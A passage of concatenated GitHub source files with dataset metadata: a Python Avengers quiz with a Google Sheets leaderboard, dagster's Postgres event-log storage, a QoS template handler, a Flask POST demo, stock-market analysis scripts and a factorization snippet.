print(\"\"\"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣤⣾⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⣠⣴⣿⡿⠟⠛⠋⣽⣿⣿⣿⣿⣿⣿⣦⣄⠀⠀⠀⠀\n⠀⠀⢀⣾⣿⠟⠁⠀⠀⠀⣼⣿⣿⠏⢸⣿⣿⡏⠻⣿⣷⡀⠀⠀\n⠀⢠⣿⡟⠁⠀⠀⠀⠀⣼⣿⣿⡟⠀⢸⣿⣿⡇⠀⠈⢻⣿⡄⠀\n⢠⣿⡟⠀⠀⠀⠀⠀⣼⣿⣿⡿⠀⠀⢸⣿⣿⡇⠀⠀⠀⢻⣿⡄\n⣸⣿⠇⠀⠀⠀⠀⣼⣿⣿⣿⠁⠀⠀⠘⢿⣿⡇⠀⠀⠀⠘⣿⣇\n⢿⣿⠀⠀⠀⠀⣰⣿⣿⣿⣇⣀⣀⣀⣼⣦⡙⠇⠀⠀⠀⠀⣿⡿\n⢸⣿⡇⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡦⠀⠀⠀⢸⣿⡇\n⠀⢿⣿⡀⣸⣿⣿⣿⠟⠉⠉⠉⠉⠉⣿⠟⣡⡆⠀⠀⢀⣿⡿⠀\n⠀⠈⠛⣰⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠠⠾⠿⠇⠀⣠⣿⡿⠁⠀\n⠀⠀⣰⣿⣿⣿⡟⣀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣾⡿⠋⠀⠀⠀\n⠀⣰⣿⣿⣿⡿⠰⠿⣿⣶⣶⣶⣶⣶⣶⣿⠿⠟⠉⠀⠀⠀⠀⠀\n⠀⠉⠉⠉⠉⠁⠀⠀⠀⠈⠉⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n\"\"\")\n\n print(\"Welcome to the Avengers quiz!\\n\")\n sleep(2)\n print(\"Test your knowledge of the Marvel Avengers movie series.\\n\")\n print(\"There are ten questions in total.\\n\")\n print(\"All questions are multiple-choice.\\n\")\n print(\"The choices are a, b, c, and d for all ten questions.\\n\")\n sleep(2)\n\n\ndef begin_quiz():\n \"\"\"\n Get user name and prompt the user if they wish to play the quiz.\n \"\"\"\n\n global user_name\n\n while True:\n print(\"Please enter your user name and hit the enter key:\")\n\n user_name = input().strip()\n\n if validate_user_name(user_name):\n break\n\n play_quiz = \"\"\n\n while play_quiz not in [\"y\", \"n\"]:\n play_quiz = input((\"Do you want to begin the quiz? (y/n) \\n\")).lower()\n\n if play_quiz == \"n\":\n print(f\"Thank you {user_name}, please try the quiz another time!\")\n\n sys.exit()\n\n if play_quiz not in [\"y\", \"n\"]:\n print(\"Invalid Input! Please enter yes (y) or no (n)\\n\",)\n\n clear_terminal()\n\n\ndef run_quiz():\n \"\"\"\n Loop through quiz_data and print questions and options.\n Request the correct answer and verify whether the answer\n is correct or incorrect.\n \"\"\"\n\n for index, quiz in enumerate(quiz_data, start=1):\n answer = \"\"\n display_question(index, quiz[\"question\"], quiz[\"options\"])\n\n while answer not in [\"a\", \"b\", \"c\", \"d\"]:\n answer = input(\"\\n\").lower()\n\n if answer not in [\"a\", \"b\", \"c\", \"d\"]:\n print(\"Invalid Input! 
Please enter a, b, c, or d\")\n\n check_answer(answer, quiz[\"answer\"])\n\n clear_terminal()\n\n display_result()\n\n\ndef update_leaderboard(data):\n \"\"\"\n Add user-name and score to Google Sheets\n \"\"\"\n\n print(\"Exporting your results to database....\\n\")\n\n update_workout = SHEET.worksheet(\"leaderboard\")\n update_workout.append_row(data)\n\n print(\"Results exported successfully!!\\n\")\n\n\ndef display_leaderboard():\n \"\"\"\n Get all values from the leaderboard worksheet.\n Sort the values array to get top scores first on the list.\n Print out username and score of the top 5 highest vales\n \"\"\"\n\n data = SHEET.worksheet(\"leaderboard\")\n\n values = data.get_all_values()\n\n values.sort(key=sort_by_score, reverse=True)\n\n print(\"Top 5 users\\n\")\n print(\"Username\\t Score\\n\")\n\n for index in range(0, 5):\n print(f\"{values[index][0]}\\t\\t {values[index][1]}\\n\")\n\n\ndef display_result():\n \"\"\"\n Print the score and ask the user if they are interested in replaying.\n Calls update_leaderboard function to add user name and score Google Sheets\n If the user chooses to play again, the replay_quiz function will be called.\n If the user decides not to play again, the application will quit.\n \"\"\"\n\n global score\n\n print(f\"Congratulations {user_name}, on completing the quiz!\\n\")\n\n play_again = \"\"\n\n print(f\"You scored {score}/10\\n\")\n\n data = [user_name, score]\n\n update_leaderboard(data)\n\n sleep(2)\n\n display_leaderboard()\n\n while play_again not in [\"y\", \"n\"]:\n play_again = input(\"Would you like to replay the quiz? (y/n)\\n\")\n\n if play_again not in [\"y\", \"n\"]:\n print(\"Invalid Input! Please enter yes (y) or no (n)\\n\")\n\n if play_again.lower() == \"y\":\n print(\"Restarting quiz....\\n\")\n score = 0\n replay_quiz()\n elif play_again.lower() == \"n\":\n print(f\"Thank you {user_name}, for taking the quiz!\\n\")\n print(\"Quitting application.....\")\n quit()\n\n\ndef replay_quiz():\n \"\"\"\n Prints restarting messages and calls run_quiz function.\n \"\"\"\n\n print(\"Restarting the quiz\\n\")\n print(f\"Best of luck {user_name}\\n\")\n\n clear_terminal()\n\n run_quiz()\n\n\ndef main():\n \"\"\"Call program main functions\"\"\"\n\n quiz_information()\n\n begin_quiz()\n\n run_quiz()\n\n\nmain()\n","repo_name":"EdwardShanahan07/avengers-quiz","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9894265127","text":"from typing import Any, ContextManager, Mapping, Optional, Sequence\n\nimport dagster._check as check\nimport sqlalchemy as db\nimport sqlalchemy.dialects as db_dialects\nimport sqlalchemy.pool as db_pool\nfrom dagster._config.config_schema import UserConfigSchema\nfrom dagster._core.errors import DagsterInvariantViolationError\nfrom dagster._core.event_api import EventHandlerFn\nfrom dagster._core.events import ASSET_CHECK_EVENTS, ASSET_EVENTS\nfrom dagster._core.events.log import EventLogEntry\nfrom dagster._core.storage.config import pg_config\nfrom dagster._core.storage.event_log import (\n AssetKeyTable,\n DynamicPartitionsTable,\n SqlEventLogStorage,\n SqlEventLogStorageMetadata,\n SqlEventLogStorageTable,\n)\nfrom dagster._core.storage.event_log.base import EventLogCursor\nfrom dagster._core.storage.event_log.migration import ASSET_KEY_INDEX_COLS\nfrom dagster._core.storage.event_log.polling_event_watcher import SqlPollingEventWatcher\nfrom dagster._core.storage.sql 
import (\n AlembicVersion,\n check_alembic_revision,\n create_engine,\n run_alembic_upgrade,\n stamp_alembic_rev,\n)\nfrom dagster._core.storage.sqlalchemy_compat import db_select\nfrom dagster._serdes import ConfigurableClass, ConfigurableClassData, deserialize_value\nfrom sqlalchemy.engine import Connection\n\nfrom ..utils import (\n create_pg_connection,\n pg_alembic_config,\n pg_statement_timeout,\n pg_url_from_config,\n retry_pg_connection_fn,\n retry_pg_creation_fn,\n)\n\nCHANNEL_NAME = \"run_events\"\n\n\nclass PostgresEventLogStorage(SqlEventLogStorage, ConfigurableClass):\n \"\"\"Postgres-backed event log storage.\n\n Users should not directly instantiate this class; it is instantiated by internal machinery when\n ``dagster-webserver`` and ``dagster-graphql`` load, based on the values in the ``dagster.yaml`` file in\n ``$DAGSTER_HOME``. Configuration of this class should be done by setting values in that file.\n\n To use Postgres for all of the components of your instance storage, you can add the following\n block to your ``dagster.yaml``:\n\n .. literalinclude:: ../../../../../../examples/docs_snippets/docs_snippets/deploying/dagster-pg.yaml\n :caption: dagster.yaml\n :lines: 1-8\n :language: YAML\n\n If you are configuring the different storage components separately and are specifically\n configuring your event log storage to use Postgres, you can add a block such as the following\n to your ``dagster.yaml``:\n\n .. literalinclude:: ../../../../../../examples/docs_snippets/docs_snippets/deploying/dagster-pg-legacy.yaml\n :caption: dagster.yaml\n :lines: 12-21\n :language: YAML\n\n Note that the fields in this config are :py:class:`~dagster.StringSource` and\n :py:class:`~dagster.IntSource` and can be configured from environment variables.\n\n \"\"\"\n\n def __init__(\n self,\n postgres_url: str,\n should_autocreate_tables: bool = True,\n inst_data: Optional[ConfigurableClassData] = None,\n ):\n self._inst_data = check.opt_inst_param(inst_data, \"inst_data\", ConfigurableClassData)\n self.postgres_url = check.str_param(postgres_url, \"postgres_url\")\n self.should_autocreate_tables = check.bool_param(\n should_autocreate_tables, \"should_autocreate_tables\"\n )\n\n self._disposed = False\n\n # Default to not holding any connections open to prevent accumulating connections per DagsterInstance\n self._engine = create_engine(\n self.postgres_url, isolation_level=\"AUTOCOMMIT\", poolclass=db_pool.NullPool\n )\n\n self._event_watcher = SqlPollingEventWatcher(self)\n\n self._secondary_index_cache = {}\n\n # Stamp and create tables if the main table does not exist (we can't check alembic\n # revision because alembic config may be shared with other storage classes)\n if self.should_autocreate_tables:\n table_names = retry_pg_connection_fn(lambda: db.inspect(self._engine).get_table_names())\n if \"event_logs\" not in table_names:\n retry_pg_creation_fn(self._init_db)\n self.reindex_events()\n self.reindex_assets()\n\n super().__init__()\n\n def _init_db(self) -> None:\n with self._connect() as conn:\n with conn.begin():\n SqlEventLogStorageMetadata.create_all(conn)\n stamp_alembic_rev(pg_alembic_config(__file__), conn)\n\n def optimize_for_webserver(self, statement_timeout: int, pool_recycle: int) -> None:\n # When running in dagster-webserver, hold an open connection and set statement_timeout\n existing_options = self._engine.url.query.get(\"options\")\n timeout_option = pg_statement_timeout(statement_timeout)\n if existing_options:\n options = f\"{timeout_option} {existing_options}\"\n 
else:\n options = timeout_option\n self._engine = create_engine(\n self.postgres_url,\n isolation_level=\"AUTOCOMMIT\",\n pool_size=1,\n connect_args={\"options\": options},\n pool_recycle=pool_recycle,\n )\n\n def upgrade(self) -> None:\n alembic_config = pg_alembic_config(__file__)\n with self._connect() as conn:\n run_alembic_upgrade(alembic_config, conn)\n\n @property\n def inst_data(self) -> Optional[ConfigurableClassData]:\n return self._inst_data\n\n @classmethod\n def config_type(cls) -> UserConfigSchema:\n return pg_config()\n\n @classmethod\n def from_config_value(\n cls, inst_data: Optional[ConfigurableClassData], config_value: Mapping[str, Any]\n ) -> \"PostgresEventLogStorage\":\n return PostgresEventLogStorage(\n inst_data=inst_data,\n postgres_url=pg_url_from_config(config_value),\n should_autocreate_tables=config_value.get(\"should_autocreate_tables\", True),\n )\n\n @staticmethod\n def create_clean_storage(\n conn_string: str, should_autocreate_tables: bool = True\n ) -> \"PostgresEventLogStorage\":\n engine = create_engine(\n conn_string, isolation_level=\"AUTOCOMMIT\", poolclass=db_pool.NullPool\n )\n try:\n SqlEventLogStorageMetadata.drop_all(engine)\n finally:\n engine.dispose()\n\n return PostgresEventLogStorage(conn_string, should_autocreate_tables)\n\n def store_event(self, event: EventLogEntry) -> None:\n \"\"\"Store an event corresponding to a run.\n\n Args:\n event (EventLogEntry): The event to store.\n \"\"\"\n check.inst_param(event, \"event\", EventLogEntry)\n insert_event_statement = self.prepare_insert_event(event) # from SqlEventLogStorage.py\n with self._connect() as conn:\n result = conn.execute(\n insert_event_statement.returning(\n SqlEventLogStorageTable.c.run_id, SqlEventLogStorageTable.c.id\n )\n )\n res = result.fetchone()\n result.close()\n\n # LISTEN/NOTIFY no longer used for pg event watch - preserved here to support version skew\n conn.execute(\n db.text(f\"\"\"NOTIFY {CHANNEL_NAME}, :notify_id; \"\"\"),\n {\"notify_id\": res[0] + \"_\" + str(res[1])}, # type: ignore\n )\n event_id = int(res[1]) # type: ignore\n\n if (\n event.is_dagster_event\n and event.dagster_event_type in ASSET_EVENTS\n and event.dagster_event.asset_key # type: ignore\n ):\n self.store_asset_event(event, event_id)\n\n if event_id is None:\n raise DagsterInvariantViolationError(\n \"Cannot store asset event tags for null event id.\"\n )\n\n self.store_asset_event_tags(event, event_id)\n\n if event.is_dagster_event and event.dagster_event_type in ASSET_CHECK_EVENTS:\n self.store_asset_check_event(event, event_id)\n\n def store_asset_event(self, event: EventLogEntry, event_id: int) -> None:\n check.inst_param(event, \"event\", EventLogEntry)\n if not (event.dagster_event and event.dagster_event.asset_key):\n return\n\n # We switched to storing the entire event record of the last materialization instead of just\n # the AssetMaterialization object, so that we have access to metadata like timestamp,\n # job, run_id, etc.\n #\n # This should make certain asset queries way more performant, without having to do extra\n # queries against the event log.\n #\n # This should be accompanied by a schema change in 0.12.0, renaming `last_materialization`\n # to `last_materialization_event`, for clarity. 
For now, we should do some back-compat.\n #\n # https://github.com/dagster-io/dagster/issues/3945\n\n # The AssetKeyTable contains a `last_materialization_timestamp` column that is exclusively\n # used to determine if an asset exists (last materialization timestamp > wipe timestamp).\n # This column is used nowhere else, and as of AssetObservation/AssetMaterializationPlanned\n # event creation, we want to extend this functionality to ensure that assets with any event\n # (observation, materialization, or materialization planned) yielded with timestamp\n # > wipe timestamp display in the Dagster UI.\n\n # As of the following PRs, we update last_materialization_timestamp to store the timestamp\n # of the latest asset observation, materialization, or materialization_planned that has occurred.\n # https://github.com/dagster-io/dagster/pull/6885\n # https://github.com/dagster-io/dagster/pull/7319\n\n # The AssetKeyTable also contains a `last_run_id` column that is updated upon asset\n # materialization. This column was not being used until the below PR. This new change\n # writes to the column upon `ASSET_MATERIALIZATION_PLANNED` events to fetch the last\n # run id for a set of assets in one roundtrip call to event log storage.\n # https://github.com/dagster-io/dagster/pull/7319\n\n values = self._get_asset_entry_values(\n event, event_id, self.has_secondary_index(ASSET_KEY_INDEX_COLS)\n )\n with self.index_connection() as conn:\n query = db_dialects.postgresql.insert(AssetKeyTable).values(\n asset_key=event.dagster_event.asset_key.to_string(),\n **values,\n )\n if values:\n query = query.on_conflict_do_update(\n index_elements=[AssetKeyTable.c.asset_key],\n set_=dict(**values),\n )\n else:\n query = query.on_conflict_do_nothing()\n conn.execute(query)\n\n def add_dynamic_partitions(\n self, partitions_def_name: str, partition_keys: Sequence[str]\n ) -> None:\n if not partition_keys:\n return\n\n # Overload base implementation to push upsert logic down into the db layer\n self._check_partitions_table()\n with self.index_connection() as conn:\n conn.execute(\n db_dialects.postgresql.insert(DynamicPartitionsTable)\n .values(\n [\n dict(partitions_def_name=partitions_def_name, partition=partition_key)\n for partition_key in partition_keys\n ]\n )\n .on_conflict_do_nothing(),\n )\n\n def _connect(self) -> ContextManager[Connection]:\n return create_pg_connection(self._engine)\n\n def run_connection(self, run_id: Optional[str] = None) -> ContextManager[Connection]:\n return self._connect()\n\n def index_connection(self) -> ContextManager[Connection]:\n return self._connect()\n\n def has_table(self, table_name: str) -> bool:\n return bool(self._engine.dialect.has_table(self._engine.connect(), table_name))\n\n def has_secondary_index(self, name: str) -> bool:\n if name not in self._secondary_index_cache:\n self._secondary_index_cache[name] = super(\n PostgresEventLogStorage, self\n ).has_secondary_index(name)\n return self._secondary_index_cache[name]\n\n def enable_secondary_index(self, name: str) -> None:\n super(PostgresEventLogStorage, self).enable_secondary_index(name)\n if name in self._secondary_index_cache:\n del self._secondary_index_cache[name]\n\n def watch(\n self,\n run_id: str,\n cursor: Optional[str],\n callback: EventHandlerFn,\n ) -> None:\n if cursor and EventLogCursor.parse(cursor).is_offset_cursor():\n check.failed(\"Cannot call `watch` with an offset cursor\")\n\n self._event_watcher.watch_run(run_id, cursor, callback)\n\n def _gen_event_log_entry_from_cursor(self, cursor) -> 
EventLogEntry:\n        with self._engine.connect() as conn:\n            cursor_res = conn.execute(\n                db_select([SqlEventLogStorageTable.c.event]).where(\n                    SqlEventLogStorageTable.c.id == cursor\n                ),\n            )\n            return deserialize_value(cursor_res.scalar(), EventLogEntry)  # type: ignore\n\n    def end_watch(self, run_id: str, handler: EventHandlerFn) -> None:\n        self._event_watcher.unwatch_run(run_id, handler)\n\n    def __del__(self) -> None:\n        # Keep the inherent limitations of __del__ in Python in mind!\n        self.dispose()\n\n    def dispose(self) -> None:\n        if not self._disposed:\n            self._disposed = True\n            self._event_watcher.close()\n\n    def alembic_version(self) -> AlembicVersion:\n        alembic_config = pg_alembic_config(__file__)\n        with self._connect() as conn:\n            return check_alembic_revision(alembic_config, conn)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-postgres/dagster_postgres/event_log/event_log.py","file_name":"event_log.py","file_ext":"py","file_size_in_byte":13839,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"42728512725","text":"# -*- coding: utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\nimport uuid\nfrom pdsframe import *\nfrom service_mds import g\nfrom service_mds import common\nfrom service_mds import pb2dict_proxy\nimport message.pds_pb2 as msg_pds\nimport message.mds_pb2 as msg_mds\n\nclass QosTemplateAddMachine(BaseMachine):\n    __metaclass__ = MataMachine\n\n    MID = msg_mds.QOS_TEMPLATE_ADD_REQUEST\n\n    def INIT(self, request):\n        self.response = MakeResponse(msg_mds.QOS_TEMPLATE_ADD_RESPONSE, request)\n        self.request = request\n        self.request_body = request.body.Extensions[msg_mds.qos_template_add_request]\n\n        if g.is_ready == False:\n            self.response.rc.retcode = msg_mds.RC_MDS_SERVICE_IS_NOT_READY\n            self.response.rc.message = \"MDS service is not ready\"\n            self.SendResponse(self.response)\n            return MS_FINISH\n\n        self.template_name = self.request_body.template_name\n        self.template_info = common.GetQosTemplateInfoByName(self.template_name)\n        if self.template_info:\n            self.response.rc.retcode = msg_mds.RC_MDS_QOS_TEMPLATE_ALREADY_ADDED\n            self.response.rc.message = \"QoS '%s' is already added\" % self.template_name\n            self.SendResponse(self.response)\n            return MS_FINISH\n\n        template_info = msg_pds.QosTemplateInfo()\n        template_info.template_name = self.template_name\n        template_info.template_id = str(uuid.uuid1())\n        template_info.qos_info.read_bps = self.request_body.qos_info.read_bps\n        template_info.qos_info.read_iops = self.request_body.qos_info.read_iops\n        template_info.qos_info.write_bps = self.request_body.qos_info.write_bps\n        template_info.qos_info.write_iops = self.request_body.qos_info.write_iops\n        # Persist the QoS template info\n        data = pb2dict_proxy.pb2dict(\"template_info\", template_info)\n        e, _ = dbservice.srv.create(\"/qostemplate/%s\" % template_info.template_id, data)\n        if e:\n            logger.run.error(\"Add template failed %s:%s\" % (e, _))\n            self.response.rc.retcode = msg_mds.RC_MDS_CREATE_DB_DATA_FAILED\n            self.response.rc.message = \"Keep data failed\"\n            self.SendResponse(self.response)\n            return MS_FINISH\n\n        # Update the QoS template list\n        g.qos_template_list.qos_template_infos.add().CopyFrom(template_info)\n\n        self.response.rc.retcode = msg_pds.RC_SUCCESS\n        self.SendResponse(self.response)\n        return 
MS_FINISH\n","repo_name":"saxisuer/smartmgr-v2","sub_path":"service_mds/qos_template_add.py","file_name":"qos_template_add.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19461416948","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n    return render_template(\"$.post().html\")\n\n\n@app.route('/post_text', methods=['POST'])\ndef post_text():\n    # Get the data\n    name = request.values[\"name\"]\n    email = request.values[\"email\"]\n    # Return a plain string\n    result = \"The user name is \" + name + \", the user email is \" + email\n    return result\n\n\n@app.route('/post_json', methods=['POST'])\ndef post_json():\n    name = request.values[\"name\"]\n    email = request.values[\"email\"]\n    # Return the data as JSON\n    result = {\"name\": name, \"email\": email}\n    return result\n\n\nif __name__ == '__main__':\n    app.run(port=5002, debug=True)\n","repo_name":"LenkyAndrews/JQuery-Learning","sub_path":"JQueryAJAX/$.post().py","file_name":"$.post().py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30940997332","text":"'''\n@author:rocky\n@email:weigesysu@qq.com\n@feature: after-close post-trade analysis\n'''\n\nfrom configure.settings import DBSelector\nimport pandas as pd\nfrom scipy import stats\nimport tushare as ts\nimport datetime\nimport os\n# import matplotlib.pyplot as plt\nimport numpy as np\n\npd.set_option('display.max_rows', None)\n\n\ndef volume_calculation(code, start, end):\n    '''\n    Compute the cumulative trading volume of a stock over a time window\n\n    :param start: start time\n    :param end: end time\n    :return: volume, and its share of the day's total\n    '''\n\n    df = ts.get_today_ticks(code)\n\n    # Convert str to datetime so the times can be compared below\n    df['time'] = df['time'].map(lambda x: datetime.datetime.strptime(str(x), '%H:%M:%S'))\n    total = df['volume'].sum()\n    start = datetime.datetime.strptime(start, '%H:%M:%S')\n    end = datetime.datetime.strptime(end, '%H:%M:%S')\n    new_df = df[(df['time'] >= start) & (df['time'] < end)]\n\n    volume = new_df['volume'].sum()\n    rate = round(volume * 1.00 / total * 100, 2)\n\n    return volume, rate\n\n\ndef today_statistics(today):\n    '''\n    :help: statistics of today's price changes: median, mean, etc.\n    :param today: date, e.g. 2019-01-01\n    :return: None\n    '''\n\n    engine = DBSelector().get_engine('db_daily')\n    df = pd.read_sql(today, engine, index_col='index')\n    # Drop suspended stocks (volume == 0)\n\n    df = df[df['volume'] != 0]\n    median = round(df['changepercent'].median(), 2)\n    mean = round(df['changepercent'].mean(), 2)\n    std = round(df['changepercent'].std(), 2)\n    p_25 = round(stats.scoreatpercentile(df['changepercent'], 25), 2)\n    p_50 = round(stats.scoreatpercentile(df['changepercent'], 50), 2)\n    p_75 = round(stats.scoreatpercentile(df['changepercent'], 75), 2)\n\n    print('Median: {}'.format(median))\n    print('Mean: {}'.format(mean))\n    print('Std: {}'.format(std))\n    print('25%: {}'.format(p_25))\n    print('50%: {}'.format(p_50))\n    print('75%: {}'.format(p_75))\n\n\ndef zt_location(date):\n    '''\n    :help: analyze the regional distribution of limit-up stocks\n    :param date: date in the form 20180404\n    :return:\n    '''\n    engine_zdt = DBSelector().get_engine('db_zdt')\n    engine_basic = DBSelector().get_engine('db_stock')\n\n    df = pd.read_sql(date + 'zdt', engine_zdt, index_col='index')\n    df_basic = pd.read_sql('tb_basic_info', engine_basic, index_col='index')\n    result = {}\n\n    for code in df['代码'].values:\n        try:\n            area = df_basic[df_basic['code'] == code]['area'].values[0]\n            result.setdefault(area, 0)\n            result[area] += 1\n\n        except Exception as e:\n            print(e)\n\n    new_result = sorted(result.items(), key=lambda x: x[1], reverse=True)\n    for k, v in new_result:\n        print(k, v)\n\n\ndef show_percentage(price):\n    '''\n    :help: compute the price at each percentage step from the closing price\n    :param price: closing price\n    :return:\n    '''\n\n    for i in range(1, 11):\n        print('{}\\t+{}% -> {}'.format(price, i, round(price * (1 + 0.01 * i), 2)))\n\n    for i in range(1, 11):\n        print('{}\\t-{}% -> {}'.format(price, i, round(price * (1 - 0.01 * i), 2)))\n
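\n\n# For example, show_percentage(100) prints lines such as\n#   100  +3% -> 103.0  and  100  -3% -> 97.0,\n# i.e. each step is round(price * (1 +/- 0.01 * i), 2).\n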
\n\ndef stock_profit(code, start, end):\n    '''\n    :help: compute the rate of return over a period\n    :param code: stock code\n    :param start: start date\n    :param end: end date\n    :return: rate of return\n    '''\n\n    k_data = ts.get_k_data(start=start, end=end, code=code)\n\n    if len(k_data) == 0:\n        return np.nan\n\n    start_price = k_data['close'].values[0]\n    print(\"Start price: \", start_price)\n\n    end_price = k_data['close'].values[-1]\n\n    print(\"End price: \", end_price)\n\n    earn_profit = (end_price - start_price) / start_price * 100\n    print(\"Profit: \", round(earn_profit, 2))\n    return round(earn_profit, 2)\n\n\ndef exclude_kcb(df):\n    '''\n    :help: exclude STAR Market (688xxx) stocks\n    :param df:\n    :return:\n    '''\n    non_kcb = df[~df['code'].map(lambda x: True if x.startswith('688') else False)]\n    return non_kcb\n\n\ndef plot_percent_distribution(date):\n    '''\n    :help: plot the distribution of price changes for a given day\n    :param date:\n    :return:\n    '''\n    import matplotlib.pyplot as plt\n\n    total = []\n    engine = DBSelector().get_engine('db_daily')\n    df = pd.read_sql(date, con=engine)\n    df = exclude_kcb(df)\n\n    count = len(df[(df['changepercent'] >= -11) & (df['changepercent'] <= -9.5)])\n    total.append(count)\n\n    for i in range(-9, 9, 1):\n        count = len(df[(df['changepercent'] >= i * 1.00) & (df['changepercent'] < ((i + 1)) * 1.00)])\n        total.append(count)\n\n    count = len(df[(df['changepercent'] >= 9)])\n    total.append(count)\n    # print(total)\n    df_figure = pd.Series(total)\n    plt.figure(figsize=(16, 10))\n    X = range(-10, 10)\n    plt.bar(X, height=total, color='y')\n    for x, y in zip(X, total):\n        plt.text(x, y + 0.05, y, ha='center', va='bottom')\n    plt.grid()\n    plt.xticks(range(-10, 11))\n    plt.show()\n\n\ndef year_price_change(year, ignore_new_stock=False):\n    '''\n    :param year: year\n    :param ignore_new_stock: exclude stocks newly listed in that year\n    Rank stocks by price change for a given year\n    :return: None; writes an Excel file\n    '''\n\n    year = int(year)\n\n    basic = ts.get_stock_basics()\n    pro = []\n\n    name = ''\n    # basic['timeToMarket']=pd.to_datetime(basic['timeToMarket'],format='%Y%m%d')\n\n    # Drop stocks that listed during the year\n    if ignore_new_stock:\n        basic = basic[basic['timeToMarket'] < int('{}0101'.format(year))]\n        name = '_ignore_new_stock'\n\n    filename = '{}_all_price_change{}.xls'.format(year, name)\n\n    for code in basic.index.values:\n        p = stock_profit(code, '{}-01-01'.format(year), '{}-01-01'.format(year + 1))\n        pro.append(p)\n\n    basic['p_change_year'] = pro\n    basic = basic.sort_values(by='p_change_year', ascending=False)\n    basic.to_excel(filename, encoding='gbk')\n\n\ndef stock_analysis(filename):\n    '''\n    # Analyze the yearly data\n    :return:\n    '''\n\n    df = pd.read_excel(filename, encoding='gbk')\n    print('mean:\\n', df['p_change_year'].mean())\n    print('max:\\n', df['p_change_year'].max())\n    print('min:\\n', df['p_change_year'].min())\n    print('middle\\n', df['p_change_year'].median())\n    # plt.figure()\n    # df['p_change_year'].plot.hist()\n    # plt.show()\n\n\ndef cb_stock_year():\n    '''\n    Rank last year's price changes of convertible-bond underlying stocks\n    :return:\n    '''\n    engine = DBSelector().get_engine('db_stock')\n    df_cb = pd.read_sql('tb_bond_jisilu', engine)\n    filename = '2019_all_price_change_ignore_new_stock.xls'\n    df_all = pd.read_excel(filename, encoding='gbk')\n    zg_codes = list(df_cb['正股代码'].values)\n    df = df_all[df_all['code'].isin(zg_codes)]\n    df.to_excel('2019_cb_zg.xls', encoding='gbk')\n
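\n\n# For example, with a first close of 10.0 and a last close of 12.5,\n# stock_profit returns (12.5 - 10.0) / 10.0 * 100 = 25.0.\n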
\n\ndef main():\n    ## Cumulative volume of one stock over a time window ####\n    # code = '000069'\n    # v, ratio = volume_calculation(code, '09:30:00', '10:00:00')\n    # print('\\n')\n    # print(v, ratio)\n\n    ## Distribution of price changes #####\n    # TODAY = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n    # today_statistics(TODAY)\n\n    ## Regional distribution of limit-up stocks ####\n    # TODAY = datetime.datetime.now().strftime(\"%Y%m%d\")\n    # zt_location(TODAY)\n\n    ## Print the percentage price ladder\n    # show_percentage(121)\n\n    ## Rate of return of one stock over a period\n    # stock_profit('300333','2019-01-01','2020-02-03')\n\n    ## Plot the price-change distribution\n    # date = '2020-02-07'\n    # plot_percent_distribution(date)\n\n    # Yearly price change of every stock\n    # year_price_change(2019,True)\n    # stock_analysis('2019_all_price_change_ignore_new_stock.xls')\n\n    cb_stock_year()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Rockyzsu/stock","sub_path":"StockAnalyze.py","file_name":"StockAnalyze.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","stars":4515,"dataset":"github-code","pt":"53"} +{"seq_id":"31637610488","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# time spent: planning ? min / implementation ? min / debugging ? min\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\na,b = map(int,input().split())\nmod = 10**9+7\n\ndef factorization(n):\n    arr = []\n    temp = n\n    for i in range(2, int(n**0.5//1)+1 ):\n        if(temp%i == 0):\n            count=0\n            while( temp%i == 0):\n                count += 1\n                temp = temp // i\n            arr.append([i, count])\n        if temp==1:\n            break\n\n    if(temp != 1):\n        arr.append([temp, 1])\n\n    return arr\n
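\n# For example, factorization(12) walks i = 2..3 and returns [[2, 2], [3, 1]],\n# i.e. 12 = 2**2 * 3.\n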
